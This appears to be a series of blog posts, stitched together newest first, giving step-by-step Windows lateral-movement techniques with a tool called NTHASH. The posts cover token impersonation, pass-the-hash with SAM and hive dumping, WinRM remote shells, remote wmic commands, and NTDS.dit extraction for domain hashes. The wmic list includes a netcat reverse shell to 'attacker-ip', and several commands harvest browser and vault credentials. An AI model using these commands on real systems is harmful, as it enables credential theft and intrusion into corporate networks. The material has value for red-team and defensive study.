In previous articles, we used Pass The Hash to perform lateral movement.
This time, let's drop PTH and use token impersonation.
Indeed, if you are lucky enough to be a local admin, you can impersonate a token owned by another user currently logged on to the same system as you (it could be a terminal server).
That other user may happen to be admin on systems where you currently don't have access (yet).
Impersonating this user will let you perform lateral movement.
This is as simple as running NTHASH-win64.exe /runastoken /pid:xxx, where xxx is the pid of a process owned by that other user.
Just keep in mind that you need to be running an elevated shell to do so.
If you are not yet, simply run NTHASH-win64.exe /runas before running the command above.
As simple as that: again, no need to know the user's password (nor the hash this time).
Once running in the context of this other user, you can then run commands like:
NTHASH-win64.exe /chrome
NTHASH-win64.exe /firefox
NTHASH-win64.exe /enumcred
NTHASH-win64.exe /enumcred2
NTHASH-win64.exe /enumvault
…
Last one in the « pass the hash » series.
Initially we used a remote RDP console.
We then demonstrated a netcat reverse shell.
What if we don't have RDP, or can't/don't want to use netcat to the remote target?
WinRM to the rescue!
1. Ensure WinRM is set up on the attacker host: winrm quickconfig
2. Add trusted hosts * (or filter to an IP) on the attacker host: powershell "Set-Item WSMan:\localhost\Client\TrustedHosts -Value '*' -Force"
3. Enable PS remoting on the remote target host (use wmic / see previous article): powershell.exe "Enable-PSRemoting -Force"
4. Add trusted hosts * (or filter to an IP) on the attacker host: powershell "Set-Item WSMan:\localhost\Client\TrustedHosts -Value '*' -Force" (use wmic / see previous article)
5. Enjoy a remote shell under PowerShell (from the attacker host): Enter-PSSession -ComputerName target
In the previous article, we introduced the use of WMIC in a « pass the hash » shell.
See below a list of useful wmic commands gathered from around the internet:
rem remember impersonate is ok but delegate is not
rem become familiar with the available aliases
wmic alias list brief
rem see the available methods for any class
wmic [class] call /?
rem file stuff
wmic /node:target DATAFILE where "drive='c:' AND path='\\windows\\'" GET Name,readable,size
wmic /node:target datafile "c:\\temp\\test.txt" call rename c:\temp\abc.txt
wmic /node:target datafile "c:\\temp\\test.txt" call copy c:\temp\abc.txt
rem process stuff
wmic /node:target process call create "nc attacker-ip 9000 -e cmd.exe"
wmic /node:target process call create "cmd.exe /c echo test > c:\temp\test.txt"
wmic /node:target process where name="explorer.exe" call terminate
wmic /node:target process where processid="1234" call terminate
wmic /node:target process get name, processid
rem users and groups stuff
WMIC /node:target USERACCOUNT LIST brief
wmic /node:target path Win32_GroupUser
Following the previous article on NTHASH, let's see how to perform lateral movement using « pass the hash » (PTH).
In 3 steps, let's retrieve some hashes and then perform a PTH (using the MS RDP client).
1. Retrieve the hash:
NTHASH-win64.exe /dumpsam
or NTHASH-win64.exe /dumphashes /system
or, after saving the hives with reg save hklm\sam sam.sav and reg save hklm\system system.sav:
NTHASH-win64.exe /dumphashes /offline
or (in a domain environment):
NTHASH-win64.exe /logonpasswords
2. Pass the hash: NTHASH-win64.exe /pth /user:username /password:8846F7EAEE8FB117AD06BDD830B7586C /domain:.
3. In the newly opened « pth » cmd shell, type mstsc /restrictedadmin /v:target
You will end up logged on as the « username » account in an RDP console on the server named « target ».
Try a simple whoami for fun, then go back to credential harvesting for this account using /firefox, /chrome, /enumvault, /enumcred, etc.
And you never had to enter the « username » password…
Note that any other client tool (preferably built into Windows) that inherits NTLM credentials from the current logon session will work too (tasklist/taskkill, wmic, net, winrm/powershell, psexec, etc.).
Decrypt NTDS (aka NT Directory Service) Active Directory hashes for servers up to Windows 2012 R2 (RC4) and Windows 2016 and up (AES). NTDS uses the Extensible Storage Engine (aka ESE) format.
You can dump all necessary files (registry hives and the ntds database) with:
powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"
2/
You need the OS (here a domain controller) syskey to decrypt an NTDS database. You can obtain the system key offline using NTHASH and the SYSTEM and SECURITY registry hives.
Your SYSTEM and SECURITY hives may be inconsistent, in which case make sure to get not only the hives but also all the logs that go with them. Then open them in regedit: the hives and logs should be consolidated altogether, ready to be used by NTHASH.
4/
Your ntds.dit may be corrupted. Check this with esentutl /g ntds.dit and then repair it with esentutl /p ntds.dit.
esentutl /g ntds.dit
Extensible Storage Engine Utilities for Microsoft(R) Windows(R)
Version 6.3
Copyright (C) Microsoft Corporation. All Rights Reserved.
Initiating INTEGRITY mode...
Database: ntds.dit
Temp. Database: .\TEMPINTEG26304.EDB
Checking database integrity.
The database is not up-to-date. This operation may find that
this database is corrupt because data from the log files has
yet to be placed in the database.
To ensure the database is up-to-date please use the 'Recovery' operation.
Scanning Status (% complete)
0 10 20 30 40 50 60 70 80 90 100
|----|----|----|----|----|----|----|----|----|----|
...................................................
Integrity check completed.
Database is CORRUPTED, the last full backup of this database was on 04/10/2024 10:30:19
Operation terminated with error -1206 (JET_errDatabaseCorrupted, Non database file or corrupted db) after 4.297 seconds.
esentutl /p ntds.dit
Extensible Storage Engine Utilities for Microsoft(R) Windows(R)
Version 6.3
Copyright (C) Microsoft Corporation. All Rights Reserved.
Initiating REPAIR mode...
Database: ntds.dit
Temp. Database: TEMPREPAIR19620.EDB
Checking database integrity.
The database is not up-to-date. This operation may find that
this database is corrupt because data from the log files has
yet to be placed in the database.
To ensure the database is up-to-date please use the 'Recovery' operation.
Scanning Status (% complete)
0 10 20 30 40 50 60 70 80 90 100
|----|----|----|----|----|----|----|----|----|----|
...................................................
Initiating DEFRAGMENTATION mode...
Database: ntds.dit
Defragmentation Status (% complete)
0 10 20 30 40 50 60 70 80 90 100
|----|----|----|----|----|----|----|----|----|----|
...................................................
Moving 'TEMPREPAIR19620.EDB' to 'ntds.dit'... DONE!
Note:
It is recommended that you immediately perform a full backup
of this database. If you restore a backup made before the
defragmentation, the database will be rolled back to the state
it was in at the time of that backup.
Operation completed successfully in 14.515 seconds.